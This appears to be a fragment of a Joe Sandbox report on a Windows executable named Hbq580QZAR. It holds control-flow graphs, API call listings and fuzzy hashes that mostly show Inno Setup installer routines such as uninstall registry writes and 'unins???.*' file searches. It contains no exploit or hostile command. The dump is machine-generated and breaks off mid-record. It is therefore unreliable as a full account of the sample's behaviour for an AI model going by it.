1883->1815 1884->1866 1885->1815 1890 423f64-423f6b 1885->1890 1890->1815 1908 423f71-423f80 call 4181e0 IsWindowEnabled 1890->1908 1891->1815 1892->1866 1893->1815 1909 423d9f-423da4 call 422c4c 1893->1909 1899->1815 1900->1815 1903->1815 1906->1815 1907->1815 1908->1815 1937 423f86-423f9c call 412310 1908->1937 1909->1815 1935 423efd-423f00 1916->1935 1917->1815 1922->1815 1923->1922 1924->1815 1942 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1924->1942 1935->1917 1937->1815 1946 423fa2-423fac 1937->1946 1942->1815 1946->1815
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                            • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                            • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                            • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2187 4675b4-4675bb 2181->2187 2182->2187 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2187->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2187->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2329 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2329 2321->2329 2347 467bb6-467bd1 2329->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2329->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2431 467f40-467f53 call 4145fc 2428->2431 2432 467f3d 2428->2432 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2431->2429 2432->2431 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2535 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2535 2536 4683d1-4683ee call 44ffdc call 450138 2532->2536 2549 468453 2535->2549 2550 46843b-468442 2535->2550 2536->2535 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2557 46846f-468478 2554->2557 2558 46847a-46847c 2554->2558 2556 468480-46849a 2555->2556 2559 468543-46854a 2556->2559 2560 4684a0-4684a9 2556->2560 2557->2555 2557->2558 2558->2556 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2587 468584-468598 call 403494 2563->2587 2588 468575-468582 call 47c440 2563->2588 2572 4685f0-4685f9 2564->2572 2576 4685ff-468617 call 429fd8 2572->2576 2577 468709-468738 call 42b96c call 44e83c 2572->2577 2589 46868e-468692 2576->2589 2590 468619-46861d 2576->2590 2606 4687e6-4687ea 2577->2606 2607 46873e-468742 2577->2607 2602 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2587->2602 2603 46859a-4685a5 call 403494 2587->2603 2588->2602 2596 468694-46869d 2589->2596 2597 4686e2-4686e6 2589->2597 2598 46861f-468659 call 40b24c call 47c26c 2590->2598 2596->2597 2604 46869f-4686aa 2596->2604 2609 4686fa-468704 call 42a05c 2597->2609 2610 4686e8-4686f8 call 42a05c 2597->2610 2663 46865b-468662 2598->2663 2664 468688-46868c 2598->2664 2602->2572 2603->2602 2604->2597 2614 4686ac-4686b0 2604->2614 2617 4687ec-4687f3 2606->2617 2618 468869-46886d 2606->2618 2616 468744-468756 call 40b24c 2607->2616 2609->2577 2610->2577 2622 4686b2-4686d5 call 40b24c call 406ac4 2614->2622 2641 468788-4687bf call 47c26c call 44cb0c 2616->2641 2642 468758-468786 call 47c26c call 44cbdc 2616->2642 2617->2618 2625 4687f5-4687fc 2617->2625 2626 4688d6-4688df 2618->2626 2627 46886f-468886 call 40b24c 2618->2627 2673 4686d7-4686da 2622->2673 2674 4686dc-4686e0 2622->2674 2625->2618 2636 4687fe-468809 2625->2636 2634 4688e1-4688f9 call 40b24c call 4699fc 2626->2634 2635 4688fe-468913 call 466ee0 call 466c5c 2626->2635 2656 4688c6-4688d4 call 4699fc 2627->2656 2657 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2627->2657 2634->2635 2682 468965-46896f call 414a44 2635->2682 2683 468915-468938 call 42a040 call 40b24c 2635->2683 2636->2635 2644 46880f-468813 2636->2644 2684 4687c4-4687c8 2641->2684 2642->2684 2655 468815-46882b call 40b24c 2644->2655 2679 46885e-468862 2655->2679 2680 46882d-468859 call 42a05c call 4699fc call 46989c 2655->2680 2656->2635 2657->2635 2663->2664 2675 468664-468676 call 406ac4 2663->2675 2664->2589 2664->2598 2673->2597 2674->2597 2674->2622 2675->2664 2701 468678-468682 2675->2701 2679->2655 2694 468864 2679->2694 2680->2635 2696 468974-468993 call 414a44 2682->2696 2715 468943-468952 call 414a44 2683->2715 2716 46893a-468941 2683->2716 2692 4687d3-4687d5 2684->2692 2693 4687ca-4687d1 2684->2693 2700 4687dc-4687e0 2692->2700 2693->2692 2693->2700 2694->2635 2711 468995-4689b8 call 42a040 call 469b5c 2696->2711 2712 4689bd-4689e0 call 47c26c call 403450 2696->2712 2700->2606 2700->2616 2701->2664 2706 468684 2701->2706 2706->2664 2711->2712 2730 4689e2-4689eb 2712->2730 2731 4689fc-468a05 2712->2731 2715->2696 2716->2715 2720 468954-468963 call 414a44 2716->2720 2720->2696 2730->2731 2734 4689ed-4689fa call 47c440 2730->2734 2732 468a07-468a19 call 403684 2731->2732 2733 468a1b-468a2b call 403494 2731->2733 2732->2733 2742 468a2d-468a38 call 403494 2732->2742 2741 468a3d-468a54 call 414b18 2733->2741 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2749 468a5f-468a68 2746->2749 2750 468a6a-468a74 call 42b0e4 2746->2750 2752 468a99-468abe call 403400 * 3 2747->2752 2749->2750 2753 468a79-468a88 call 414a44 2749->2753 2750->2753 2753->2752
                                                                                            APIs
                                                                                              • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                              • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                              • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                              • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                              • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                              • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                              • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                              • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                              • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                              • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                              • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                              • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                              • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0212FC4C,02131944,?,?,02131974,?,?,021319C4,?), ref: 004683FD
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                              • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                            • String ID: $(Default)$STOPIMAGE$%H
                                                                                            • API String ID: 3231140908-2624782221
                                                                                            • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                            • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                            • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                            • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID: unins$unins???.*
                                                                                            • API String ID: 3541575487-1009660736
                                                                                            • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                            • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                            • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                            • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileFindFirstLast
                                                                                            • String ID:
                                                                                            • API String ID: 873889042-0
                                                                                            • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                            • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                            • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                            • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00000388,0046E17A), ref: 0046E0EE
                                                                                            • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,00000388,0046E17A), ref: 0046E10A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstanceVersion
                                                                                            • String ID:
                                                                                            • API String ID: 1462612201-0
                                                                                            • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                            • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                            • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                            • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                            • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                            • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                            • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                            • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                            • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                            • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: NameUser
                                                                                            • String ID:
                                                                                            • API String ID: 2645101109-0
                                                                                            • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                            • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                            • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                            • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                            • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                            • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                            • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 849 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->849 847 46f095-46f09c 846->847 848 46f09e-46f0a5 846->848 847->845 847->848 848->849 856 46f101-46f12a call 403738 call 42dde4 849->856 857 46f0e8-46f0fc call 403738 call 42dec0 849->857 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 899 46f2e4-46f309 call 40b24c call 46ee44 895->899 900 46f2a5-46f2e3 call 46ee44 * 3 895->900 919 46f30b-46f316 call 47c26c 899->919 920 46f318-46f321 call 403494 899->920 900->899 929 46f326-46f331 call 478e04 919->929 920->929 934 46f333-46f338 929->934 935 46f33a 929->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1024 46f5be-46f5c5 1019->1024 1025 46f629-46f638 1019->1025 1021 46f687-46f6bd call 494cec 1020->1021 1022 46f6df-46f6f5 RegCloseKey 1020->1022 1021->1022 1024->1025 1029 46f5c7-46f5eb call 430bcc 1024->1029 1028 46f63b-46f648 1025->1028 1032 46f65f-46f678 call 430c08 call 46eeb4 1028->1032 1033 46f64a-46f657 1028->1033 1029->1028 1039 46f5ed-46f5ee 1029->1039 1042 46f67d 1032->1042 1033->1032 1035 46f659-46f65d 1033->1035 1035->1020 1035->1032 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1028
                                                                                            APIs
                                                                                              • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                              • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                            • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
